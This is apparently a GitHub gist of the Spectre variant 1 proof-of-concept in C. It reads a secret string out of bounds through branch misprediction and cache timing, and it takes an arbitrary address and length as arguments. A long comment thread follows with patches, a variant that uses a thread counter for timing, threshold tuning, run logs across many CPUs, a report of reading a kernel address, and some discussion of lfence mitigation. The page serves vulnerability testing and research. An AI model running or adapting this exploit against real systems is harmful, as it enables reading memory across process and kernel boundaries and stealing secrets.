| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <stdint.h> | |
| #ifdef _MSC_VER | |
| #include <intrin.h> /* for rdtscp and clflush */ | |
| #pragma optimize("gt",on) | |
| #else | |
| #include <x86intrin.h> /* for rdtscp and clflush */ | |
| #endif | |
| /******************************************************************** | |
| Victim code. | |
| ********************************************************************/ | |
| unsigned int array1_size = 16; | |
| uint8_t unused1[64]; | |
| uint8_t array1[160] = { | |
| 1, | |
| 2, | |
| 3, | |
| 4, | |
| 5, | |
| 6, | |
| 7, | |
| 8, | |
| 9, | |
| 10, | |
| 11, | |
| 12, | |
| 13, | |
| 14, | |
| 15, | |
| 16 | |
| }; | |
| uint8_t unused2[64]; | |
| uint8_t array2[256 * 512]; | |
| char * secret = "The Magic Words are Squeamish Ossifrage."; | |
| uint8_t temp = 0; /* Used so compiler won’t optimize out victim_function() */ | |
| void victim_function(size_t x) { | |
| if (x < array1_size) { | |
| temp &= array2[array1[x] * 512]; | |
| } | |
| } | |
| /******************************************************************** | |
| Analysis code | |
| ********************************************************************/ | |
| #define CACHE_HIT_THRESHOLD(80) /* assume cache hit if time <= threshold */ | |
| /* Report best guess in value[0] and runner-up in value[1] */ | |
| void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2]) { | |
| static int results[256]; | |
| int tries, i, j, k, mix_i, junk = 0; | |
| size_t training_x, x; | |
| register uint64_t time1, time2; | |
| volatile uint8_t * addr; | |
| for (i = 0; i < 256; i++) | |
| results[i] = 0; | |
| for (tries = 999; tries > 0; tries--) { | |
| /* Flush array2[256*(0..255)] from cache */ | |
| for (i = 0; i < 256; i++) | |
| _mm_clflush( & array2[i * 512]); /* intrinsic for clflush instruction */ | |
| /* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */ | |
| training_x = tries % array1_size; | |
| for (j = 29; j >= 0; j--) { | |
| _mm_clflush( & array1_size); | |
| for (volatile int z = 0; z < 100; z++) {} /* Delay (can also mfence) */ | |
| /* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */ | |
| /* Avoid jumps in case those tip off the branch predictor */ | |
| x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */ | |
| x = (x | (x >> 16)); /* Set x=-1 if j&6=0, else x=0 */ | |
| x = training_x ^ (x & (malicious_x ^ training_x)); | |
| /* Call the victim! */ | |
| victim_function(x); | |
| } | |
| /* Time reads. Order is lightly mixed up to prevent stride prediction */ | |
| for (i = 0; i < 256; i++) { | |
| mix_i = ((i * 167) + 13) & 255; | |
| addr = & array2[mix_i * 512]; | |
| time1 = __rdtscp( & junk); /* READ TIMER */ | |
| junk = * addr; /* MEMORY ACCESS TO TIME */ | |
| time2 = __rdtscp( & junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */ | |
| if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size]) | |
| results[mix_i]++; /* cache hit - add +1 to score for this value */ | |
| } | |
| /* Locate highest & second-highest results results tallies in j/k */ | |
| j = k = -1; | |
| for (i = 0; i < 256; i++) { | |
| if (j < 0 || results[i] >= results[j]) { | |
| k = j; | |
| j = i; | |
| } else if (k < 0 || results[i] >= results[k]) { | |
| k = i; | |
| } | |
| } | |
| if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0)) | |
| break; /* Clear success if best is > 2*runner-up + 5 or 2/0) */ | |
| } | |
| results[0] ^= junk; /* use junk so code above won’t get optimized out*/ | |
| value[0] = (uint8_t) j; | |
| score[0] = results[j]; | |
| value[1] = (uint8_t) k; | |
| score[1] = results[k]; | |
| } | |
| int main(int argc, | |
| const char * * argv) { | |
| size_t malicious_x = (size_t)(secret - (char * ) array1); /* default for malicious_x */ | |
| int i, score[2], len = 40; | |
| uint8_t value[2]; | |
| for (i = 0; i < sizeof(array2); i++) | |
| array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */ | |
| if (argc == 3) { | |
| sscanf(argv[1], "%p", (void * * )( & malicious_x)); | |
| malicious_x -= (size_t) array1; /* Convert input value into a pointer */ | |
| sscanf(argv[2], "%d", & len); | |
| } | |
| printf("Reading %d bytes:\n", len); | |
| while (--len >= 0) { | |
| printf("Reading at malicious_x = %p... ", (void * ) malicious_x); | |
| readMemoryByte(malicious_x++, value, score); | |
| printf("%s: ", (score[0] >= 2 * score[1] ? "Success" : "Unclear")); | |
| printf("0x%02X=’%c’ score=%d ", value[0], | |
| (value[0] > 31 && value[0] < 127 ? value[0] : "?"), score[0]); | |
| if (score[1] > 0) | |
| printf("(second best: 0x%02X score=%d)", value[1], score[1]); | |
| printf("\n"); | |
| } | |
| return (0); | |
| } |
This comment has been minimized.
This comment has been minimized.
kuhar
commented
Jan 4, 2018
|
|
This comment has been minimized.
This comment has been minimized.
tommythorn
commented
Jan 4, 2018
|
I was going to say that, but also the parentheses around |
This comment has been minimized.
This comment has been minimized.
tommythorn
commented
Jan 4, 2018
|
BTW, thanks for this. I hadn't fully appreciated how easy this is to deploy. |
This comment has been minimized.
This comment has been minimized.
crozone
commented
Jan 4, 2018
•
|
I made the I upped the EDIT: I did some more experimenting with the EDIT 2: Full project and fixed code here: https://github.com/crozone/SpectrePoC |
This comment has been minimized.
This comment has been minimized.
progman32
commented
Jan 4, 2018
|
Thanks for posting this. With some slight tweaking[1], I was able to recover the secret on an ancient pentium-m 1.50ghz from 2004 or 2005. This issue has existed for a while 50c50
< #define CACHE_HIT_THRESHOLD(80) /* assume cache hit if time <= threshold */
---
> #define CACHE_HIT_THRESHOLD (80) /* assume cache hit if time <= threshold */
89c89
< time1 = __rdtscp( & junk); /* READ TIMER */
---
> time1 = __rdtsc(); /* READ TIMER */
91c91
< time2 = __rdtscp( & junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
---
> time2 = __rdtsc() - time1; /* READ TIMER & COMPUTE ELAPSED TIME */Compiled under gcc version 4.8.4 (Ubuntu 4.8.4-2ubuntu1~14.04.3) with
[1] Space fix as mentioned earlier in thread, and using |
This comment has been minimized.
This comment has been minimized.
Saxtheowl
commented
Jan 4, 2018
|
Wow nice :) |
This comment has been minimized.
This comment has been minimized.
kfrz
commented
Jan 4, 2018
|
Fascinating, and terrifying. |
This comment has been minimized.
This comment has been minimized.
splitbrain
commented
Jan 4, 2018
|
Had to change |
This comment has been minimized.
This comment has been minimized.
teh-monad
commented
Jan 4, 2018
•
|
Thanks for sharing. |
This comment has been minimized.
This comment has been minimized.
beatcracker
commented
Jan 4, 2018
•
|
Trying to compile it on Tried different options for P.S. |
This comment has been minimized.
This comment has been minimized.
beatcracker
commented
Jan 4, 2018
•
|
Here is my result I've played with |
This comment has been minimized.
This comment has been minimized.
blackjec69
commented
Jan 4, 2018
•
If compile without any "-march" - UPD gcc-5, ubuntu 16.04 x86-64 |
This comment has been minimized.
This comment has been minimized.
awt135
commented
Jan 4, 2018
•
|
windows 10 x64 worked , then test for linux also work .. wait for windows update tonight.
|
This comment has been minimized.
This comment has been minimized.
ghost
commented
Jan 4, 2018
|
Works just fine on Opteron 4170 HE under FreeBSD. Fantastic. |
This comment has been minimized.
This comment has been minimized.
diimdeep
commented
Jan 4, 2018
•
|
i5-4288U CPU @ 2.60GHz |
This comment has been minimized.
This comment has been minimized.
Symbian9
commented
Jan 4, 2018
Source: https://www.linux.org.ru/news/security/13934697?cid=13935544 |
This comment has been minimized.
This comment has been minimized.
midnightpizza
commented
Jan 4, 2018
•
|
Interesting, FX-8320 always returns: with cache hit threshold 100
.. just score 2 all the way? hmm otherwise at default (80)
But with an AMD Opteron(tm) Processor 4122 > (100) (same with (80))
Both Kernel 4.9.73, grsec |
This comment has been minimized.
This comment has been minimized.
Symbian9
commented
Jan 4, 2018
•
|
With patches
It compiled but test not reproduced If try add CPU info OS info So, my PC secured from |
This comment has been minimized.
This comment has been minimized.
i336
commented
Jan 4, 2018
|
Using progman32's modifications I'm able to run this on my ThinkPad T43. Each read reports For reference, I'm using
Question: What is the oldest CPU this is likely to work on?progman32 mentions that |
This comment has been minimized.
This comment has been minimized.
annmuor
commented
Jan 4, 2018
•
|
Arch, 4.14.5, i5-5250U works. Changed address to kernel space table and got address of sys_read. |
This comment has been minimized.
This comment has been minimized.
62726164
commented
Jan 4, 2018
|
Maybe add a simple Makefile. Something like this: |
This comment has been minimized.
This comment has been minimized.
eyes-0nly
commented
Jan 4, 2018
|
i5-3230M CPU @ 2.60GHz
|
This comment has been minimized.
This comment has been minimized.
DooMMasteR
commented
Jan 4, 2018
•
|
On my It works with a |
This comment has been minimized.
This comment has been minimized.
Symbian9
commented
Jan 4, 2018
•
|
UPD: https://gist.github.com/ErikAugust/724d4a969fb2c6ae1bbd7b2a9e3d4bb6#gistcomment-2311002 Its look like with additional patches from https://www.linux.org.ru/news/security/13934697?cid=13935709
This PoC also reproduced on 64-bit Sadly, but |
This comment has been minimized.
This comment has been minimized.
tista3
commented
Jan 4, 2018
|
Ubuntu 17.10 ??? SUCCESS!! ./spectre |
This comment has been minimized.
This comment has been minimized.
lasse-kristensen
commented
Jan 4, 2018
•
|
I just updated a Centos 7 server with the new kernel 3.10.0-693.11.6.el7.x86_64, but i still get "The Magic Words", is that intended? |
This comment has been minimized.
This comment has been minimized.
klugemonkey
commented
Jan 4, 2018
|
Debian 4.14.11 (patched for Meltdown), Xeon E5-1660, CACHE_HIT_THRESHOLD (30), gcc 7.2.0-18 |
This comment has been minimized.
This comment has been minimized.
spartanthe
commented
Jan 4, 2018
•
|
Just to verify it's not fake, at Line 130: printf("Reading %d bytes:\n", len); in debugger Interactive OK, then continue run: Vulnerable: Intel Core i7-5600U CPU @ 2.60GHz, Win10x64 |
This comment has been minimized.
This comment has been minimized.
ykanello
commented
Jan 4, 2018
•
|
So far has worked for me on: (I had to change buffer sizes and play with some syntax to make it compile in all the above mentioned systems but basically is the same code) |
This comment has been minimized.
This comment has been minimized.
klugemonkey
commented
Jan 4, 2018
•
|
Kernel patch for KPTI is only applicable to Meltdown, not Spectre. Use dmesg | grep "isolation" to see if your kernel is patched. |
This comment has been minimized.
This comment has been minimized.
klugemonkey
commented
Jan 4, 2018
•
|
Still can't seem to get it to work on Xeon E5-2690 v2 that is reported by OpenVZ (kernel 2.6.32). Not sure if being a virtualized CPU skews the timings or if it's just not working with my gcc 4.9.2. Seems like it gets a few characters sometimes. |
This comment has been minimized.
This comment has been minimized.
LionsAd
commented
Jan 4, 2018
•
|
I needed the following patch, but then works fine on Mac OS X. --- spectre.c.old 2018-01-04 15:13:32.000000000 +0100
+++ spectre.c 2018-01-04 15:11:45.000000000 +0100
@@ -47,12 +47,13 @@
/********************************************************************
Analysis code
********************************************************************/
-#define CACHE_HIT_THRESHOLD(80) /* assume cache hit if time <= threshold */
+#define CACHE_HIT_THRESHOLD (80) /* assume cache hit if time <= threshold */
/* Report best guess in value[0] and runner-up in value[1] */
void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2]) {
static int results[256];
- int tries, i, j, k, mix_i, junk = 0;
+ int tries, i, j, k, mix_i;
+ unsigned int junk = 0;
size_t training_x, x;
register uint64_t time1, time2;
volatile uint8_t * addr;
@@ -133,7 +134,7 @@
readMemoryByte(malicious_x++, value, score);
printf("%s: ", (score[0] >= 2 * score[1] ? "Success" : "Unclear"));
printf("0x%02X=’%c’ score=%d ", value[0],
- (value[0] > 31 && value[0] < 127 ? value[0] : "?"), score[0]);
+ (value[0] > 31 && value[0] < 127 ? value[0] : '?'), score[0]);
if (score[1] > 0)
printf("(second best: 0x%02X score=%d)", value[1], score[1]);
printf("\n"); |
This comment has been minimized.
This comment has been minimized.
romansavrulin
commented
Jan 4, 2018
•
|
Works on macbook 12 |
This comment has been minimized.
This comment has been minimized.
jedisct1
commented
Jan 4, 2018
|
Works with minor changes on OpenBSD-current: https://gist.github.com/jedisct1/3bbb6e50b768968c30629bf734ea49c6/6ede3c9a3356a4a55a27febaf38157897c4fed09 |
This comment has been minimized.
This comment has been minimized.
hyc
commented
Jan 4, 2018
|
No success on my Q9300. gcc 5.4.0, Linux 4.4.0 (Ubuntu) |
This comment has been minimized.
This comment has been minimized.
jedisct1
commented
Jan 4, 2018
|
It works on Google Cloud shell. Was it expected? |
This comment has been minimized.
This comment has been minimized.
This comment has been minimized.
This comment has been minimized.
LionsAd
commented
Jan 4, 2018
•
|
I got it to work without rdtsc but just with a counter thread (like in the webworker example in JS): --- spectre.c 2018-01-04 15:30:03.000000000 +0100
+++ spectre-thread.c 2018-01-04 15:59:48.000000000 +0100
@@ -1,6 +1,8 @@
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
+#include <pthread.h>
+
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
@@ -45,6 +47,22 @@
}
/********************************************************************
+Thread code
+********************************************************************/
+int counter_thread_ended = 0;
+uint32_t counter = 0;
+
+void *counter_function(void *x_void_ptr)
+{
+ while (!counter_thread_ended) {
+ counter++;
+ }
+
+ printf("counter thread finished\n");
+ return NULL;
+}
+
+/********************************************************************
Analysis code
********************************************************************/
#define CACHE_HIT_THRESHOLD (80) /* assume cache hit if time <= threshold */
@@ -87,9 +105,9 @@
for (i = 0; i < 256; i++) {
mix_i = ((i * 167) + 13) & 255;
addr = & array2[mix_i * 512];
- time1 = __rdtscp( & junk); /* READ TIMER */
+ time1 = counter; /* READ TIMER */
junk = * addr; /* MEMORY ACCESS TO TIME */
- time2 = __rdtscp( & junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
+ time2 = counter - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
results[mix_i]++; /* cache hit - add +1 to score for this value */
}
@@ -120,6 +138,15 @@
int i, score[2], len = 40;
uint8_t value[2];
+ // Setup the counter thread.
+ pthread_t counter_thread;
+
+ if (pthread_create(&counter_thread, NULL, counter_function, NULL)) {
+ fprintf(stderr, "Error creating thread\n");
+ return 1;
+ }
+ // End Setup
+
for (i = 0; i < sizeof(array2); i++)
array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */
if (argc == 3) {
@@ -139,5 +166,14 @@
printf("(second best: 0x%02X score=%d)", value[1], score[1]);
printf("\n");
}
+
+ // Start: Exit counter thread
+ counter_thread_ended = 1;
+ if (pthread_join(counter_thread, NULL)) {
+ fprintf(stderr, "Error joining thread\n");
+ return 2;
+ }
+ // End: Exit counter thread
+
return (0);
}The accuracy obviously varies a little, but I can get the right result in most runs. That means this can now be also tested on non-mobile Pentium I, II and III ... |
This comment has been minimized.
This comment has been minimized.
LionsAd
commented
Jan 4, 2018
•
|
@i336 I just posted a version using only threads and no rdtsc instruction, so it should work on all processors that have dynamic branch prediction. |
This comment has been minimized.
This comment has been minimized.
C37H40O9
commented
Jan 4, 2018
|
openSUSE Leap 42.3 with patch |
This comment has been minimized.
This comment has been minimized.
hyc
commented
Jan 4, 2018
|
@LionsAd no success on my Q9300 with this version either. |
This comment has been minimized.
This comment has been minimized.
KeT4yn
commented
Jan 4, 2018
|
Can you drop here compiled win application to test? |
This comment has been minimized.
This comment has been minimized.
diimdeep
commented
Jan 4, 2018
|
ARM anyone ? |
This comment has been minimized.
This comment has been minimized.
heeen
commented
Jan 4, 2018
|
Works on AMD Ryzen Threadripper 1950X 16-Core Processor |
This comment has been minimized.
This comment has been minimized.
LionsAd
commented
Jan 4, 2018
|
@hyc Can you post your output, please? I also added statistics, which you could run and put in pastebin here: https://gist.github.com/LionsAd/5116c9cd37f5805c797ed16fafbe93e4 |
This comment has been minimized.
This comment has been minimized.
spartanthe
commented
Jan 4, 2018
|
BTW, who can explain me how this piece of code works? |
This comment has been minimized.
This comment has been minimized.
LionsAd
commented
Jan 4, 2018
|
I have trouble with the threaded code to get a clear result, but unclear still works fine. However the 0x00 and 0x01 location in array2 seem to be sometimes cached or at least have significantly lower access times as the other ones (Mac OS X). |
This comment has been minimized.
This comment has been minimized.
aburlak
commented
Jan 4, 2018
•
|
Mitigating against this: It's important that _mm_lfence is after the bounds check, but before data access. |
This comment has been minimized.
This comment has been minimized.
kingsumos
commented
Jan 4, 2018
|
Results on Intel(R) Atom(TM) CPU C3558 Reading at malicious_x = 0xffffffffffdffb20... Success: 0x54=’T’ score=2 |
This comment has been minimized.
This comment has been minimized.
ktdd
commented
Jan 4, 2018
|
Two debian servers I run: Reading 40 bytes: etc Windows 10 Insider 17063: Reading 40 bytes: |
This comment has been minimized.
This comment has been minimized.
ssstonebraker
commented
Jan 4, 2018
|
Does this script detect both spectre and meltdown? |
This comment has been minimized.
This comment has been minimized.
faew
commented
Jan 4, 2018
•
|
CentOS 3.10.0-693.11.6.el7.x86_64 gcc --std=c99 spectre.c -o spectre |
This comment has been minimized.
This comment has been minimized.
yvoinov
commented
Jan 4, 2018
|
Intel Xeon. Solaris 10 kernel Generic_150401-58 Threaded version (original gives core dump - illegal instruction) gcc -std=c99 -o spectre spectre.c ./spectreReading 40 bytes: |
This comment has been minimized.
This comment has been minimized.
yvoinov
commented
Jan 4, 2018
|
Solaris 10 kernel Generic_150401-58 ./spectreReading 40 bytes: |
This comment has been minimized.
This comment has been minimized.
7r0
commented
Jan 4, 2018
•
|
Win10 16299 x86 x64 |
This comment has been minimized.
This comment has been minimized.
7r0
commented
Jan 4, 2018
•
|
AWS Google Cloud |
This comment has been minimized.
This comment has been minimized.
liamsomerville
commented
Jan 4, 2018
|
no success on mac osx 10.13.1 |
This comment has been minimized.
This comment has been minimized.
jboger
commented
Jan 4, 2018
•
|
macos 10.13.2 (2,8 GHz Intel Core i7) Reading 40 bytes: |
This comment has been minimized.
This comment has been minimized.
ferreirasc
commented
Jan 4, 2018
•
|
macOS 10.12.6 (1.6GHz i5): |
This comment has been minimized.
This comment has been minimized.
citycat4
commented
Jan 4, 2018
|
Compiled succesful, but run unclean.
BUT - working with threaded version of spectre from here - https://gist.github.com/LionsAd/5116c9cd37f5805c797ed16fafbe93e4
Calculate Linux 17
|
This comment has been minimized.
This comment has been minimized.
StallmanSlave
commented
Jan 4, 2018
|
Having a hard time trying to compile to code on Anyone have that? |
This comment has been minimized.
This comment has been minimized.
imarki360
commented
Jan 4, 2018
|
Works on the following:
|
This comment has been minimized.
This comment has been minimized.
citycat4
commented
Jan 4, 2018
|
But - unclear run on VM (CentOS 6, run only threaded version, non-threaded does not compile - no __rdtsc):
|
This comment has been minimized.
This comment has been minimized.
tolunayozturk
commented
Jan 4, 2018
|
Intel(R) Core(TM) i5-5257U CPU @ 2.70GHz gcc --std=c99 -o spectre spectre.c |
This comment has been minimized.
This comment has been minimized.
banderlog
commented
Jan 4, 2018
•
|
Genuine Intel(R) CPU U7300 @ 1.30GHz Results for original spectre.c
Results for patched spectre.c (CACHE_HIT_THRESHOLD (100), __rdtsc() instead of __rtdscp()):
Playing with CACHE_HIT_THRESHOLD size did not help much. With >300 it shows more success, but symbols are incorrect. |
This comment has been minimized.
This comment has been minimized.
ndurbinsynchr
commented
Jan 4, 2018
•
|
Running: $ lscpu | grep CPU Had to make to changes for the spectre.c to complie: -(value[0] > 31 && value[0] < 127 ? value[0] : "?"), score[0]); Results: $ ./spectre |
This comment has been minimized.
This comment has been minimized.
citycat4
commented
Jan 4, 2018
|
Also works against more old home system:
Calculate Linux 17
|
This comment has been minimized.
This comment has been minimized.
citycat4
commented
Jan 4, 2018
|
@banderlog, try to decrease CACHE_HIT. I have tried to run with 60 and receive partially "clean" run. Decrease to 50 - and receive full "clean" run |
This comment has been minimized.
This comment has been minimized.
Gungthar
commented
Jan 4, 2018
|
Result: /proc/cpuinfo: processor : 0 processor : 1 |
This comment has been minimized.
This comment has been minimized.
LionsAd
commented
Jan 4, 2018
|
@banderlog I would try with more runs (9999 instead of 999) and also use an even higher threshold (130) and also try with a way lower one (e.g. 60). |
This comment has been minimized.
This comment has been minimized.
plotkin1996
commented
Jan 4, 2018
|
Added space before (80). Total success with scope=2 on everything. |
This comment has been minimized.
This comment has been minimized.
lordlorenzcode
commented
Jan 4, 2018
|
On Mac: Processor Name: Intel Core i5 - Processor Speed: 2,8 GHz
|
This comment has been minimized.
This comment has been minimized.
ssstonebraker
commented
Jan 4, 2018
|
I'm running the patched kernel on Centos 7 but the program still returns the string. Am I doing something wrong here? |
This comment has been minimized.
This comment has been minimized.
tomwisniewskiprv
commented
Jan 4, 2018
•
|
Worked just fine on my linux with : model name : Intel(R) Core(TM) i5-6400 CPU @ 2.70GHz On Windows I had to compile it with -march=native and the results are : Reading at malicious_x = 00001024... Success: 0x54=ÔÇÖTÔÇÖ score=2 |
This comment has been minimized.
This comment has been minimized.
imarki360
commented
Jan 4, 2018
|
@ssstonebraker There are two vulnerabilities- "Meltdown" and "Spectre". The patched kernel fixes Meltdown, but there is no fix (yet) for Spectre. |
This comment has been minimized.
This comment has been minimized.
mancubus77
commented
Jan 4, 2018
|
Compilation: |
This comment has been minimized.
This comment has been minimized.
ziacik
commented
Jan 4, 2018
|
With @LionsAd's patches success on macOS 10.13.2, Intel Core i3-540 |
This comment has been minimized.
This comment has been minimized.
te11ur
commented
Jan 4, 2018
|
windows 7, intel-core(i5)-3317U Reading 40 bytes: |
This comment has been minimized.
This comment has been minimized.
oschonrock
commented
Jan 4, 2018
•
|
**Edit: On FreeBSD 11.1 with clang 4 compiles fine with the __rdtscp, same AMD Opteron 4386..and secret revealed at threshhold 200 ** clang --version
FreeBSD clang version 4.0.0 (tags/RELEASE_400/final 297347) (based on LLVM 4.0.0)
Target: x86_64-unknown-freebsd11.1
clang -O0 spectre.c -ospectre && ./spectre
diff -u spectre.c.orig spectre.c
--- spectre.c.orig 2018-01-04 23:36:24.169168000 +0000
+++ spectre.c 2018-01-04 23:31:08.121980000 +0000
@@ -47,12 +47,13 @@
/********************************************************************
Analysis code
********************************************************************/
-#define CACHE_HIT_THRESHOLD(80) /* assume cache hit if time <= threshold */
+#define CACHE_HIT_THRESHOLD (200) /* assume cache hit if time <= threshold */
/* Report best guess in value[0] and runner-up in value[1] */
void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2]) {
static int results[256];
- int tries, i, j, k, mix_i, junk = 0;
+ int tries, i, j, k, mix_i;
+ unsigned int junk = 0;
size_t training_x, x;
register uint64_t time1, time2;
volatile uint8_t * addr;
@@ -133,10 +134,10 @@
readMemoryByte(malicious_x++, value, score);
printf("%s: ", (score[0] >= 2 * score[1] ? "Success" : "Unclear"));
printf("0x%02X=’%c’ score=%d ", value[0],
- (value[0] > 31 && value[0] < 127 ? value[0] : "?"), score[0]);
+ (value[0] > 31 && value[0] < 127 ? value[0] : '?'), score[0]);
if (score[1] > 0)
printf("(second best: 0x%02X score=%d)", value[1], score[1]);
printf("\n");
}
return (0);
-}
\ No newline at end of file
+}
AMD broken as well! |
This comment has been minimized.
This comment has been minimized.
utf8everywhere
commented
Jan 5, 2018
|
@progman32 replacing |
This comment has been minimized.
This comment has been minimized.
nextco
commented
Jan 5, 2018
•
|
Linux Arch 4.14.9-1-ARCH #1 SMP PREEMPT Tue Dec 26 00:18:37 UTC 2017 x86_64 GNU/Linux $ lscpu Architecture: x86_64 CPU op-mode(s): 32-bit, 64-bit Byte Order: Little Endian CPU(s): 2 On-line CPU(s) list: 0,1 Thread(s) per core: 1 Core(s) per socket: 2 Socket(s): 1 NUMA node(s): 1 Vendor ID: GenuineIntel CPU family: 6 Model: 42 Model name: Intel(R) Core(TM) i7-2700K CPU @ 3.50GHz Stepping: 7 CPU MHz: 3492.070 BogoMIPS: 6986.14 Hypervisor vendor: KVM Virtualization type: full L1d cache: 32K L1i cache: 32K L2 cache: 256K L3 cache: 8192K NUMA node0 CPU(s): 0,1 Flags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx rdtscp lm constant_tsc rep_good nopl xtopology nonstop_tsc cpuid pni pclmulqdq ssse3 cx16 sse4_1 sse4_2 x2apic popcnt aes xsave avx hypervisor lahf_lm $ ./spectre Reading 40 bytes: Reading at malicious_x = 0xffffffffffdfedc8... Success: 0x54=’T’ score=2 Reading at malicious_x = 0xffffffffffdfedc9... Success: 0x68=’h’ score=19 (second best: 0x05 score=7) Reading at malicious_x = 0xffffffffffdfedca... Success: 0x65=’e’ score=2 Reading at malicious_x = 0xffffffffffdfedcb... Success: 0x20=’ ’ score=2 Reading at malicious_x = 0xffffffffffdfedcc... Success: 0x4D=’M’ score=2 Reading at malicious_x = 0xffffffffffdfedcd... Success: 0x61=’a’ score=2 Reading at malicious_x = 0xffffffffffdfedce... Success: 0x67=’g’ score=2 Reading at malicious_x = 0xffffffffffdfedcf... Success: 0x69=’i’ score=17 (second best: 0x05 score=6) Reading at malicious_x = 0xffffffffffdfedd0... Success: 0x63=’c’ score=2 Reading at malicious_x = 0xffffffffffdfedd1... Success: 0x20=’ ’ score=2 Reading at malicious_x = 0xffffffffffdfedd2... Success: 0x57=’W’ score=7 (second best: 0x05 score=1) Reading at malicious_x = 0xffffffffffdfedd3... Success: 0x6F=’o’ score=2 Reading at malicious_x = 0xffffffffffdfedd4... Success: 0x72=’r’ score=7 (second best: 0x05 score=1) Reading at malicious_x = 0xffffffffffdfedd5... Success: 0x64=’d’ score=2 Reading at malicious_x = 0xffffffffffdfedd6... Success: 0x73=’s’ score=7 (second best: 0x05 score=1) Reading at malicious_x = 0xffffffffffdfedd7... Success: 0x20=’ ’ score=7 (second best: 0x05 score=1) Reading at malicious_x = 0xffffffffffdfedd8... Success: 0x61=’a’ score=2 Reading at malicious_x = 0xffffffffffdfedd9... Success: 0x72=’r’ score=7 (second best: 0x05 score=1) Reading at malicious_x = 0xffffffffffdfedda... Success: 0x65=’e’ score=2 Reading at malicious_x = 0xffffffffffdfeddb... Success: 0x20=’ ’ score=2 Reading at malicious_x = 0xffffffffffdfeddc... Success: 0x53=’S’ score=2 Reading at malicious_x = 0xffffffffffdfeddd... Success: 0x71=’q’ score=2 Reading at malicious_x = 0xffffffffffdfedde... Success: 0x75=’u’ score=2 Reading at malicious_x = 0xffffffffffdfeddf... Success: 0x65=’e’ score=7 (second best: 0x05 score=1) Reading at malicious_x = 0xffffffffffdfede0... Success: 0x61=’a’ score=2 Reading at malicious_x = 0xffffffffffdfede1... Success: 0x6D=’m’ score=2 Reading at malicious_x = 0xffffffffffdfede2... Success: 0x69=’i’ score=31 (second best: 0x00 score=12) Reading at malicious_x = 0xffffffffffdfede3... Success: 0x73=’s’ score=2 Reading at malicious_x = 0xffffffffffdfede4... Success: 0x68=’h’ score=2 Reading at malicious_x = 0xffffffffffdfede5... Success: 0x20=’ ’ score=2 Reading at malicious_x = 0xffffffffffdfede6... Success: 0x4F=’O’ score=2 Reading at malicious_x = 0xffffffffffdfede7... Success: 0x73=’s’ score=7 (second best: 0x05 score=1) Reading at malicious_x = 0xffffffffffdfede8... Success: 0x73=’s’ score=2 Reading at malicious_x = 0xffffffffffdfede9... Success: 0x69=’i’ score=2 Reading at malicious_x = 0xffffffffffdfedea... Success: 0x66=’f’ score=2 Reading at malicious_x = 0xffffffffffdfedeb... Success: 0x72=’r’ score=2 Reading at malicious_x = 0xffffffffffdfedec... Success: 0x61=’a’ score=2 Reading at malicious_x = 0xffffffffffdfeded... Success: 0x67=’g’ score=2 Reading at malicious_x = 0xffffffffffdfedee... Success: 0x65=’e’ score=2 Reading at malicious_x = 0xffffffffffdfedef... Success: 0x2E=’.’ score=2 |
This comment has been minimized.
This comment has been minimized.
ghost
commented
Jan 5, 2018
•
|
@StallmanSlave There are some issues that need to be fixed |
This comment has been minimized.
This comment has been minimized.
rich0
commented
Jan 5, 2018
•
|
I added the "_mm_lfence();" mitigation on my Ryzen 5, and the exploit still worked. Is this an Intel-specific mitigation, or perhaps it doesn't work on Ryzen in particular? The same was true using asm ("lfence"); Edit: I found that this also doesn't work on a Phenom II. So, that lfence fix might be Intel-specifc. I'm not sure what others are seeing. My source is at: https://gist.github.com/rich0/056eebebc1f88a624e36680e0de36011 |
This comment has been minimized.
This comment has been minimized.
ssstonebraker
commented
Jan 5, 2018
•
|
@imarki360 is there c code like this one to prove that meltdown is fixed on a patched system? Why does Microsoft and Redhat say that their fixes address spectre if they really don't? Sorry I'm a bit confused here would you mind explaining it? |
This comment has been minimized.
This comment has been minimized.
crozone
commented
Jan 5, 2018
|
I have a repository set up with the fixed code, makefile, and a results issue: https://github.com/crozone/SpectrePoC We might want to start documenting the results under the results issue. @ErikAugust I've given you attribution, but let me know if this isn't OK. |
This comment has been minimized.
This comment has been minimized.
ghost
commented
Jan 5, 2018
•
|
$ uname -a $ lscpu $ ./spectre.out |
This comment has been minimized.
This comment has been minimized.
uhhi
commented
Jan 5, 2018
|
Can this code really show that reading other processes memory is possible? Shouldn't it have some additional code that creates a process or some way to run a second process without the secret? |
This comment has been minimized.
This comment has been minimized.
crozone
commented
Jan 5, 2018
|
@uhhi You can run it with an arbitrary address and length as the first and second command line argument. |
This comment has been minimized.
This comment has been minimized.
threatinteltest
commented
Jan 5, 2018
|
uname -a ./spectre.out |
This comment has been minimized.
This comment has been minimized.
Reslient
commented
Jan 5, 2018
|
issue is output like gcc -std=c99 -O0 spectre.c -o spectre -march=native |
This comment has been minimized.
This comment has been minimized.
aburlak
commented
Jan 5, 2018
•
